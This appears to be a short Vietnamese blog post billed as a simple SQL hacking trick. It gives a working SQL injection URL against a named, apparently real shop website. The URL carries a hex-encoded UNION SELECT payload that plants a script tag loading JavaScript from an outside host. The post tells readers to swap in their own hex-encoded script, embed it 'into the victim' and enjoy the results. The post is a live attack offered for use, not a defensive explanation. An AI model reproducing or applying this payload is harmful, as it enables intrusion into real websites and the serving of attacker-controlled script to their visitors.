@name: General Injection Explorer @version: 4.8.1 @date: 31/11/2011 /*! jQuery v1.7.1 jquery.com | jquery.org/license */
Cách hack sql đơn giản = javascript
ngắn gọn và dễ hiểu:
http://thanhphatbn.com/index.php?frame=product_detail&id=228000%20UNION%20SELECT%201,2,3,4,5,6,7,concat%28%280x3c736372697074207372633d27687474703a2f2f796c696e682e636f6d2f73716c692e6a73273e3c2f7363726970743e0d0a%29%29volcano,9,10,11,12,13,14,15,16,17,18,19,20,21,22--%20-
code js: http://ylinh.com/sqli.js
hex : <script src='link to file js'></script>
sử dụng : concat((0xhex...))volcano để nhúng đoạn script vào victim và hưởng thụ thành quả
link hex: http://www.string-functions.com/string-hex.aspx
cuối cùng xem video là biết cách hack ngay !
About : megagame và bài viết __ SQL injection simple with javascript
Cảm ơn bạn đã tham quan Blog và ghé xem bài viết này
Nếu có vấn đề thắc mắc hoặc cần thảo luận, hãy comment cho chúng tôi ở phía dưới nhé
0 nhận xét:
Đăng nhận xét